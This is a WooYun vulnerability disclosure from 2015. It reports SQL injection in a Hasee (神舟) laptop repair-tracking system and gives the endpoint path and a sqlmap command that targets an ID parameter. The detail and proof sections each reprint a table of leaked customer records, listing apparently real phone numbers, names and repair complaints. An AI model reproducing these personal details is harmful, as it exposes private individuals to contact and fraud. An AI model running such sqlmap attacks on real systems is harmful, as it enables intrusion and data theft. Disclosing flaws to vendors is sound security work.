当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158786

漏洞标题:神舟某返修系统sql注射泄露45W客户(姓名/号码/地址)及返修信息

相关厂商:神舟

漏洞作者: 路人甲

提交时间:2015-12-07 13:50

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

你用的是神舟吗?
求个首显。

详细说明:

神舟电脑客返机跟踪系统

**.**.**.**/RmaTrace/Fwz_Login.Asp


sqlmap.py -u "**.**.**.**/RmaTrace/Info_Pub.Asp?ID=452117" --dbs


B1.png


B2.png


B3.png


+---------------------------+---------+-------------------+
| Tel | Name | Problem |
+---------------------------+---------+-------------------+
| 0554-5309986 | 陈浩 | 不开机,断电. |
| 15017938030 | 白生 | 屏幕两点过多 |
| 13410207714 | 赵生 | 不开机,(返修未取) |
| 15891198244 | 周川 | 无法开机 |
| 010-66019746 | 解列波 | 声音输出口插耳机死机无声音 |
| 0313-5909528 | 盛羽科技 | 玩游戏花屏死机 |
| 0412-6116829/13050058517 | 海城亢明 | 外壳伤 |
+---------------------------+---------+-------------------+

漏洞证明:

神舟电脑客返机跟踪系统

**.**.**.**/RmaTrace/Fwz_Login.Asp


sqlmap.py -u "**.**.**.**/RmaTrace/Info_Pub.Asp?ID=452117" --dbs


B1.png


B2.png


B3.png


+---------------------------+---------+-------------------+
| Tel | Name | Problem |
+---------------------------+---------+-------------------+
| 0554-5309986 | 陈浩 | 不开机,断电. |
| 15017938030 | 白生 | 屏幕两点过多 |
| 13410207714 | 赵生 | 不开机,(返修未取) |
| 15891198244 | 周川 | 无法开机 |
| 010-66019746 | 解列波 | 声音输出口插耳机死机无声音 |
| 0313-5909528 | 盛羽科技 | 玩游戏花屏死机 |
| 0412-6116829/13050058517 | 海城亢明 | 外壳伤 |
+---------------------------+---------+-------------------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-11 18:03

厂商回复:

CNVD确认所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无


漏洞评价:

评价

  1. 2015-12-07 13:53 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:430 漏洞数:123 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    有个段子是这么讲的,买了神舟笔记本,一年的时间只能用半年,因为另外半年实在返厂维修……所以神舟才这么便宜……

  2. 2015-12-07 15:46 | vc1 ( 路人 | Rank:26 漏洞数:5 | vc1)

    先上船,沉了再说

  3. 2015-12-07 17:17 | Qiudays ( 路人 | Rank:16 漏洞数:11 | 感觉自己萌萌哒)

    咋一看,我还以为是火箭呢~~